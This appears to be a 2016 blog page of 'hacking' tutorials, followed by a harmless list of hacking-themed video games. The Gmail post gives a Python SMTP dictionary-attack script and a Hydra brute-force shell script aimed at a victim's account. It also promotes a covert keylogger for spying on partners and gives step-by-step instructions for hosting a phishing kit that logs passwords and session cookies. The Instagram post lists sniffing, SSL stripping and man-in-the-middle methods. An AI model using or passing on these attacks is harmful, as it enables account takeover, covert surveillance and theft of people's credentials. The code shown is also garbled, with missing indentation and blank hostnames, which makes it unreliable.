Showing posts with label tutorials-n-tricks. Show all posts
Showing posts with label tutorials-n-tricks. Show all posts

Friday, November 18, 2016

// //

How to hack gmail account | Hacking Gmail

Gmail is one of the largest free and paid mail service provided by google. You can't hack gmail by exploiting any thing in google other than you have 0 day exploit. But Hacking gmail via client side or browser based attacks.

What is brute force attack?

In brute force attack,script or program try the each and every combination of password probability to hack victim account.Brute force attack is the only successful method to hack account but this process will take long time depend upon the length of password.

How To Hack Gmail Account Via Bash Script?

Firstly we will use the script to hack gmail account password.This script is not based on hydra and it use TLS port 587 in place of SSL port 465.This script is very powerful with high successful rate

# Program: Gmail Dictionary Attack v2
# Author: BurnCT
# Purpose: Brute force using a dictionary attack over TLS.
import smtplib 
smtpserver = smtplib.SMTP("", 587)
user = raw_input("Enter the target's email address: ")
passwfile = raw_input("Enter the password file name: ")
passwfile = open(passwfile, "r") 
for password in passwfile: 
smtpserver.login(user, password)
print "[+] Password Found: %s" % password 
except smtplib.SMTPAuthenticationError: 
print "[!] Password Incorrect: %s" % password
In the above script enter the victim email id and provide the path of crackstation dictionery to hack gmail account

Hack Gmail Account Using Hydra In Kali Linux 2.0

1. Open Kali Terminal

2. In the terminal,type below commad:
3. The screen will up with new windows,type the below code in file

#! /bin/bashecho Simple Email Cracking Script in /bin/bashecho Written By: kalilinuxdojoecho NOTE: Make sure you have wordlists!echo Let us Begin:echo Choose a SMTP service: Gmail = / Yahoo = / Hotmail = /:read smtpecho Enter Email Address:read emailecho Provide Directory of Wordlist for Passwords:read wordlisthydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
4. Save the above file using below commad:
5. Now provide the read,write and execute permission to using below command.
chmod ugo+rwx

6. Now launch the to hak gmail account.
After launching the above script,it will ask you to enter the appropriate details like victim email id,path of wordlist (/usr/share/wordlists directory) etc...

Hacking gmail password using Hydra

THC Hydra is very prominent online brute-force tool and has been featured in Null-Byte quite a lot. It is dictionary based, as you will have to provide a wordlist with possible passwords. You can read the README here:

Let's open up Leafpad, or your text editing program of your choice.

Step 2Bash Time!

We're going to write a little bit of script, so that we can save some time instead of going through the hassle of actually typing out parameters.
On Leafpad, type:
#! /bin/bash
echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = / Yahoo = / Hotmail = /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
And after you got it, save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your desktop, but in /root.
Now, I am going to explain how the script works.
#! /bin/bash simply means that everything is in bash.
echo simply means to tell the computer to say something. For example, echo Hello World means to tell the computer to output Hello World.
read is asking for user input. this will then store your input into a variable. read email would mean for you to enter something, and it will be stored into the email.
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you may tell, there are some parameters with a $. This is the variable with stored values you previously input in the read command.

Step 3Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.

Let's open up Terminal. Type in
chmod a+x (ofc replace yourscript with the name you actually gave to the bash file)


Now we can finally use it!
In terminal, let's type
It's working!
The script is self-explanatory. Type in the SMTP service of the target's email, where is Gmail. After that, you provide the gmail account, such as and give a wordlist directory, which you can find some default ones in the /usr/share/wordlists directory, or you can create your own with Crunch.
This is the least difficult way you can hack into any Gmail account. It can be done using a light programme known as the keylogger.  By installing this software on any computer, it will record all the keys entered in the computer and this will include passwords. From there, you can proceed to hack Gmail online.
Do you need any special knowledge to use the keylogger?
Not at all. Keylogger is made to be used by anyone, including first-timers. You will find it easy to operate even if you’ve never used it before.Both installation and issue are a breeze. All you need is to have some computer knowledge and you can hack any mail account with it. This is the best hack gmail password software.

Read More

Is Keylogger detectable?

After the installation is done, the keylogger starts working in the background and cannot be detected. It is not possible for anyone using the PC to know what’s happening.

What if I can’t access the Computer of My Target?

That’s not a problem at all. Using a special keylogger, you can get the passwords from a computer you can access as well as one that’s out of reach. This keylogger, called Realtime-Spy allows you to reach remote computers:
Most Notable Features of Realtime-Spy
  • Both Remote or Local Installation
You can gain access to computer physically or remotely
  • Easy Operation
It a small software that you can instal with a single click.
  • It’s a Covert Software
This tool operates without the slightest chance of detection.
  • Get Any Type of Password
You Can Use Keylogger to get to any kind of online Password
  • Compatible With Most Devices
Completely compatible with Windows and Mac
You will also be given a manual to provide you with technical support upon purchasing. Get your copy of Real-time Spy and let the cheating come to light.
Can It work on mobile devices?
If you would like to hack into a Gmail account but your target uses a mobile phone, you can use Spy, which is the mobile version of Keylogger.
It supports Android, Windows Mobile, Blackberry, iPhone, iPad, and even Android tabs.


Phishing is a way to capture sensitive information such as usernames, passwords and credit card details. It usually involves the use of a spoofed Gmail page (or a fake Gmail website) whose look and feel is almost identical to that of the legitimate websites Gmail website. When the users try to login from this fake Gmail page and enter their password there, the login details are stolen away by the hacker.
However, creating a fake login page for Gmail and taking it online to successfully steal the password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So, unless you’re a pro hacker I only recommend using the keyloggers to hack Gmail password.

How to recognize Phish Pages?

There are two ways to recognize the Phish pages and both depends on the awareness of the user. There are some other ways also to protect yourself from Phishing but as we Prevention is better that cure. If you know how its done then surely you will also know what are its loopholes and how can we detect it.

Ways to recognize Phish Page:

1. Check the Address bar, if the URL you are visiting does not match with the original website link then its a fake page.2. If you are a great coder or understands HTML well then you can easily revert back the attack and check the hackers hacked log file. But if you by mistake entered your own details it cannot be deleted. For this you need to use IDM and run the website grabber. There in log file you can see all details of the accounts that hacker has hacked.

What’s new features in this Gmail phisher?

Since its a new phisher so friends there should be something new in it. Isn’t it. Yups, what do you think i have added in this phisher. I have added few awesome features in this phisher and list is below:

1. Incorrect password shown page bug removed

Previously what happens when user login using phisher it redirects to the original page and displays password is incorrect. But now it doesn’t show that but even do more smarter thing… As for phishing account we have to sent the email to victim, and now if victim has read the mail that means he is already login so what i have done i have utilized the cookie hack and result is guess what, when victim login using fake page he login’s in to his own original account without even showing any message or anything. Technically its called Tabnabbing another name of advanced Phishing.

2. Log File Contains more additional Information

I am sure you will love this information what more log file contains. Previously it only contains the username and password. Now log file contains all the cookie details along with IP address of the victim. And now why it becomes more significant. Previously what happens some good people means people that know phishing technique login’s through the Phish page but enters the wrong credentials and use some abusive words in login. Now when they type that also i will get their Magic cookie or simply called session cookie and IP address that i can use to hack their PC and account.  

Steps to Hack Gmail Account Password Online:

1. Download the Gmail Phisher from anysite
2. Extract the rar file and now you will get three files namely:
  • Index.htm
  • Isoftdl_log.txt
  • next.php
3. Now go to Free Hosting website and register a new account on it.4. After registering Go to File Manager on the website and Create a new directory name it as Gmail of whatever you want.5. Now double Click on the directory to open it and click on Upload. Now browse the three different files one by one from three upload boxes and click on upload.6. Now Open the Index.htm page and you will see your fake page which looks absolutely similar to Gmail original page.
7. You can directly send the above URL  to the victim but its quite detectable. So we need to spoof it. So that become little bit difficult for victim to recognize it. For that visit tk domain maker website(click here to visit).
This i have already explained in the previous article : Hack Gmail Account Step by Step
8. Now Send the Spoofed link in the mail to the victim as i have explained in the Post Hack Gmail Account Step by step.
9. Now when user login using the fake page the data in log file is written
10. That’s all friends now you have the user name password of the victim.
Read More

Wednesday, November 16, 2016

// //

How to hack instagram account | Hacking Instagram

Instagram is a big social network platform having 15 global alexa rank and 12 on US alexa rank with more than 400 million active users. Instagram can be hacked by using these simple techniques which are we going to explain here.

First we are going to list down the possible ways with which instagram account can be hacked.
Instagram can be hacking using the following methods.
  1. Social engineering can be used to hack instagram.
  2. Using Beef via kali we can hack instagram account.
  3. Hacking Instagram by sniffing traffic.
  4. Hacking Instagram via recovering their password.
  5. Instagram account hack via SS7 Attack.
  6. Hacking Victim/target browser.
  7. Hacking Instagram Account using MITM attack
  8. Compromising any computer or android and then remotely hacking their data
  9. Making them victim of any botnet and then hack instagram account.
Above are some methods anyone can use to hack instagram account. But these attacks can not be easily achieved. And also there is not 100% success rate for any hacking method other than ss7 attack.

Now i am gonna explain each method listed above later in this article. Some of the methods are the same as we use in facebook hacking. Hacking any of the social media property account or any online account of websites can be hacked by these methods. These are the ultimate methods anyone can use to hack instagram.

1.Social Engineering to use for hacking

Social Engineering is the ultimate way to hack into anything. Social engineering technique is also defined as 
Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. 
A social engineer runs what used to be called a "con game." Techniques such as appeal to vanity, appeal to authority and appeal to greed are often used in social engineering attacks. Many social engineering exploits simply rely on people's willingness to be helpful. For example, the attacker might pretend to be a co-worker who has some kind of urgent problem that requires access to additional network resources.

The term "social engineering" as an act of psychological manipulation is also associated with the social sciences.

A Hacker used set of hacking tactics to bait the target into his trap and get what he wants. if you want to hack instagram account using social engineering please wait for our next post as we are going to make step by step tutorial for the attack we are mentioning here today.

2.Beef Hackers Framework to hack a instagram account

Some of you may already knows about beef and may be they know how to use this powerful framework to hack into online accounts. But the one's who don't know about beef i am going to explain beef here but step by step tutorial for using beef will be posted later.

BeEF is short for The Browser Exploitation Framework. it’s a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.

Growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
We can use beEF to hack easily into any instagram account as we use beEF to hack into Facebook accounts 

3. Sniffing Through Network to hack instagram.

Yes It is possible to hack any instagram account using this technique. Anyone with right tools can sniff password passing through the network streams. But some of you may ask there is one thing that cannot be sniffed which is ssl or tsl. Answer to those is that
It also can be done by redirecting traffic from https to http or using sslstript tool.

sslstrip uses his code to downgrade browser from https to http. This can be tricky and sometimes it didnot work. For that we can also use other methods like rouge AP etc. There are tons of tricks that can be used to sniff ssl traffic and we are going to explain everything in the later article on here.
You have to stay put with us.

Read More

4. MITM attack to hack into instagram.

MITM attack are one of the best attack that can be used on LAN. If your target is on your network or he is using any of the network which you know of. You can easily compromise that network using wifi hacking techniques or LAN Hacking and perform a MITM attack. To get to know with MITM here is some explaination
Man in the middle is one in which the attacker secretly intercepts and relays messages between two parties who believe they are communicating directly with each other.
MiTM attacks pose a serious threat to online security because they give the attacker the ability to capture and manipulate sensitive information in real-time. The attack is a type of eavesdropping in which the entire conversation is controlled by the attacker. Sometimes referred to as a session hijacking attack, MiTM has a strong chance of success when the attacker can impersonate each party to the satisfaction of the other.

5. Hack Computer or android itself to get access to instagram.

if you had hacked the operating system then you can easily get access to instagram account. You can hack mobile or computer using many methods and then you will have full access and so you can get instagram password. for exemple you can hack them using metasploit hacking framework. 
Metasploit is ultimate framework for loading exploits. and hacking systems. We will learn about metasploit hacking in the upcoming articles.
Read More

Thursday, November 10, 2016

// //

Best Hacking Games for hackers and gamers | Top Hacker games 2017

Hacking games are found in bundle on the web So We make this List of top and best games for hackers. or The games that are mostly liked by hackers. These games make you feel like you are the actual hacker in the game. So we get to the List of these hacking games here.

Proxy - Ultimate Hacker
Hacking Games Image a screenshot


Have you ever experienced the thrill of breaking into a computer network, avoiding detection and fooling the system? Would you like to?
  • Break into secured networks by solving intense puzzles
  • Steal, destroy, and sabotage important data for credits
  • Upgrade your computer to the bleeding edge
  • Cover your tracks to avoid getting caught
  • Build your proxy network for more time on the clock
  • Light up the Hacker News with your exploits
Created with accessibility in mind, you don't have to write lines of code, or type for hours to get the feeling of being a real hacker. Proxy is playable using only the mouse!


  • Over 50 security puzzles to get through
  • Over 100 computers to hack in 30 networks
  • 15 different job types (and more?)
  • Hilarious writing from someone who just can't help himself
In Proxy - Ultimate Hacker, it's you against the world. Do you use your powers for good, or just to cause trouble?

Hacking Games Image a screenshot


Big Brother has arrived - and it’s you. Investigate the lives of citizens to find those responsible for a series of terror attacks. Information from the internet, personal communications and private files are all accessible to you. But, be warned, the information you supply will have consequences…

Orwell is a new governmental security program that has the power to survey the online presence of every person in The Nation. It can monitor all personal communications and access any computer. To preserve the privacy of citizens, human researchers examine the data Orwell finds and decide which pieces of information should be passed on to the security forces, and which should be rejected.

Selected from thousands of candidates, you are Orwell’s first human researcher. And when a terror attack rocks the Nation’s capital city of Bonton, Orwell, and you, are immediately put to the test. Starting with a single person of interest, you'll help the security forces build out and profile a network of potential culprits.

But are these people really terrorists? What does the information you reveal to Orwell say about them? What if you find out things about them that not even their loved ones know? What is the real price of maintaining the security that the Nation is yearning for?


Investigate the digital lives of citizens.
Search web pages, scour through social media posts, dating site profiles, news articles and blogs to find those responsible for a series of terror attacks.

Invade the private lives of suspects.
Listen in on chat communications, read personal emails, hack PCs, pull medical files, make connections. Find the information you need to know.

Determine the relevance of information.
Only the information you provide will be seen by the security forces and acted upon. You decide what gets seen and what does not, influencing how the suspects will be perceived.

Secure the freedom of the Nation.
Find the terrorists so the citizens of the Nation can sleep safe, knowing Orwell is watching over them.

Please note, Orwell includes mature language at multiple points throughout the game as well as mature themes and is not suitable for younger players.

Atomic Butcher: Homo Metabolicus
Hacking Games Image a screenshot


“Atomic Butcher: Homo Metabolicus” is a deranged, fast-paced, ridiculously gory, post-apocalyptic retro 2D platformer/shooter with 360° aiming.

You play the role of a crazed mutant freak, the Atomic Butcher. On your search for food in the post-apocalyptic wastelands, you blatantly destroy everything in your way and finish off a dying society. Resources are scarce, so you turn to the next best thing: meat that is still running around; whether those are dangerous mutated animals, or humans trying to rebuild a broken world does not make much of a difference. On the bottomline, they are all very tasty.

You dish out damage using mostly your own body:
  • pee on your enemies,
  • use your radioactive poop,
  • vomit the hell out of the poor bastards that encounter you, and
  • slide and dash into everything.

If that's not enough, you can use weapons lying around in the wasteland, as well as corpsesof slain enemies or anything that can be picked up. There are also a lot of deadly traps, but you may be able to use them to your advantage.

The gameplay is pretty straight-forward: kill enemies, eat their meat, find more enemies, repeat. Really, there is not more to it. Yes, the game is very violent, but it does not try to hide this behind euphemisms; it is very blunt about that, which makes this the kind of over-the-top ridiculous gem that we from Das Humankapital like to play.
Beat the single-player campaign in 13 levels stretched over 5 environments. Become the perfect weapon of mass digestion: the Homo Metabolicus. There are approximately 7 hours of gameplay waiting for you. But beware, it's not made too easy!


  • Classic platformer controls combined with 360° aiming.
  • Lots of secrets, easter eggs and hidden goodies!
  • Reactive environments: Use fire, electricity, fluids, wind etc. to your advantag!
  • Surreal post-apocalyptic stages, filled with absurd mutants and deadly traps!
  • A story line about an epic battle for the future of this planet! No, really! So really in fact, that it deserves multiple exclamation marks!!!!!
  • Retro pixel graphics drawn with intricate love for the (disgusting) details!
  • Blood! Gore! Insanity! Preposterous acts of unwarranted violence!
  • Perfect moonwalk skills of our hero!


… humanity finally managed to destroy itself: The world has ended.
The details have long been forgotten … a great collapse, mass madness, cannibalism, no more free wi-fi. After the downfall, strange beings emerged from the radiated, poisoned remains …

Beings such as you: Ages ago born as a human in the old world, then changed into something else, mutated by radiation and toxic waste. Your brain has been completely fused with your intestinal tract, and combined with your superhuman strength you have become the perfect weapon of mass digestion. Behold the next step in human evolution: “Homo Metabolicus”!

Endlessly you roam the wastes, deranged and on a mad quest for fresh meat … a scourge for the few surviving pockets of humanity, a walking manifestation of all that lead us to our end in the first place, pure desire for instant gratification and hunger, you are only known as


An epic struggle of gastronomic proportions is about to ravage what is left of the world! Be the one who might end it all, for better or for worse!

Invisible Apartment Zero
Hacking Games Image a screenshot

Teenage girl hacker stumbles upon a secret that changes her life forever. This is a cyberpunk visual novel about the growing up of a girl from the suburbs who dreams of a life in the big city. It's also about a conspiracy, hacking, surveillance, but most importantly about friendship. Invisible Apartment Zero is part of a series and is a prequel to Invisible Apartment which you can also find on Steam.

Invisible Apartment 2
Hacking Games Image a screenshot

Second part of the cyberpunk visual novel series. Set in a future in a mega city where surveillance and hacking are part of every day life, it revolves around human relations, their dreams and their fight for living a free life.

Invisible Apartment 2 is our first longer format visual novel. Part one, which is already available on Steam for some time now was a free introduction to the whole series. This part takes place months after the events of the previous part with a bunch of new characters and a ton of new locations.

Hacking Games Image a screenshot


h a c k m u d is a cyberpunk themed text-based hacking simulator for intel-compatible personal home computers. Get lost in a deep and complex world full of challenging puzzles as you engage in a rich narrative riddled with intrigue and deception.
  • Learn who you can trust as you make friends and enemies exploring the depths of abandoned future internet cyber-structure
  • Prove your worth to cyber-society by navigating the trials laid out for you by the Multi-User Domain’s governing super-intelligence, ‘The Trust’
  • ‘Patch into the hardline’ to access other users’ protected systems and steal their digital goods
  • Demonstrate hunger for power, flexibility of thought, and keen strategy to convince The Trust of your value and escape the virtual L.A.N.
  • Let the text-based interface transport you back to the early internet-era when computing was full of discovery
  • Create and destroy digital empires while exploring the constantly evolving user-created multiplayer world
  • Use real-world hacking skills (social engineering, cracking, research, scripting...) for power and influence in the M.U.D. at large


  • A deep, nuanced and engaging storyline full of discovery that will keep you guessing
  • Encourages deep exploration and testing the limits of the system through rich side-content
  • An intuitive retro-futuristic text-based computing interface that escalates to advanced with glitches, hidden commands, and arcane syntax
  • 90s film style ‘hacking mode,’ for when you need to get some ‘serious’ hacking done
  • An original electronic soundtrack which will chill you out while exploring or amp you up when the pressure’s on
  • Persistent and constantly-evolving game universe powered by an almost endless stream of user created tools, puzzles, traps and much more
  • A fluid and organic class system determined by the currently loaded upgrades on your system
  • A fully scriptable in-game world with a global player-based economy of code and in-game botting
  • Regular balance patches to keep the game fun and engaging for players of all styles and at all levels of experience

Quadrilateral Cowboy
Hacking Games Image a screenshot


Hacking. Dial tone. Cassette decks. Sabotage. Suitcase decks. Brainbox injectors.

Quadrilateral Cowboy is a single-player adventure in a cyberpunk world. Tread lightly through security systems with your hacking deck and grey-market equipment. With top-of-the-line hardware like this, it means just one thing: you answer only to the highest bidder.


  • Quadrilateral Cowboy.
  • Developer commentary.
  • Reference manual.


  • Everything in the Standard Edition.
  • Quadrilateral Cowboy interactive art book.
  • PDFs for box art, poster, and papercraft characters.
Hacking Games Image a screenshot


"This country needs more than a building right now. It needs hope." - Evey Hammond
Replica is an interactive novel game played through a cellphone and social media.
You are given a cellphone of an unknown owner. You must look for evidence of terrorism by hacking into the cellphone owner's account, under governmental coercion. Then inspecting the cellphone usage history and social media activity records.
The insane experience of peeping into someone's private life through a cellphone will transform you into the state's greatest patriot.


  • 12 Multiple Endings
  • 8 Achievements
Hacking Games Image a screenshot


Glitchspace is about reprogramming the game to solve puzzles. Trapped in an abstract cyberspace world, your way forward uses visual programming to edit environmental geometry, whilst unlocking key programming concepts along the way. Stretch, scale, rotate, manipulate and create, explore a world of reprogrammable geometry as you discover your way home, ever distant on the horizon.


  • A Reprogrammable World - Explore a cyberspace world of reprogrammable geometry.
  • A Reprogrammable Tool - Enhance your toolbox through the functions you unlock, allowing you to craft your own programs.
  • A Programming Experience - Discover key programming concepts through the puzzles you solve.
  • A Brian Eno inspired score, coupled with a lifelike soundscape.
Hacking Games Image a screenshot


HACK_IT presents players with all sorts of hacking tasks, from sniffing passwords to taking down servers to even drawing money from accounts. Breach your way into user accounts and explore the unknown.

Key Features:

  • Narrative Hacking Experience
  • Interactive Terminal
  • Unique Hacking Tools
  • Characters
  • Attack Servers
  • Keylog Passwords
  • Interactive Desktop Missions

Progressive Hacking:
Missions will progress and get more complex as you learn new methods of execution.

Desktop Missions:
Get the full immersive experience with desktop view on some missions, open apps and use them with ease.

Hacking Executable:
HACK_IT is loaded with loads of hacking applications from money loggers to password fetchers, the hacking network has the tool for your needs.

Built For Steam:
The game has been designed with Steam Integration, packed with achievements and some trading cards.

Hacking Games Image a screenshot


Hacknet is an immersive, terminal-based hacking simulator for PC. Dive down a rabbit hoIe as you follow the instructions of a recently deceased hacker, whose death may not have been the accident the media reports. Using old school command prompts and real hacking processes, you’ll solve the mystery with minimal hand-holding and a rich world full of secrets to explore.

Bit, a hacker responsible for creating the most invasive security system on the planet, is dead. When he fails to reconnect to his system for 14 days, his failsafe kicks in, sending instructions in automated emails to a lone user. As that user, it’s up to you to unravel the mystery and ensure that Hacknet-OS doesn't fall into the wrong hands.

Exploring the volatile nature of personal privacy, the prevalence of corporate greed, and the hidden powers of hackers on the internet, Hacknet delivers a true hacking simulation, while offering a support system that allows total beginners get a grasp of the real-world applications and commands found throughout the game.


Real Hacking
Based on actual UNIX commands, Hacknet focuses on real hacking, not the Hollywood-style version of it. This creates a truly immersive experience and puts players right in the thick of trying to break through the firewalls.

Unlock the mystery of Bit
A hacker is dead and the media reports don’t add up. When you are contacted by his “ghost” - an automated failsafe system - you’re drawn into the dark and murky world of underground hackers.

Full immersion
You are thrust into a persistent virtual world with no “levels” or obvious game elements to break the illusion. Follow the guidance of the emails from Bit or just dive down the rabbit hole, chasing down clues and snippets of information you find as you explore different systems.

Accessible but uncompromising
Whilst not holding your hand or dumbing down, the design of the game and the learning curve enables those with no prior terminal experience to enjoy it whilst delighting those in the know.

Killer tunes
Hack to the beat of a soundtrack featuring underground artists including Carpenter Brut (Hotline Miami) and Remi Gallego (AKA The Algorithm).
Soundtrack produced in association with The Otherworld Agency.

This List Will Goes on and on And We will Keep it updating time by time. If you have any hacking game in mind that we have missed just buzz us in comments and we will add the game in the article.
Read More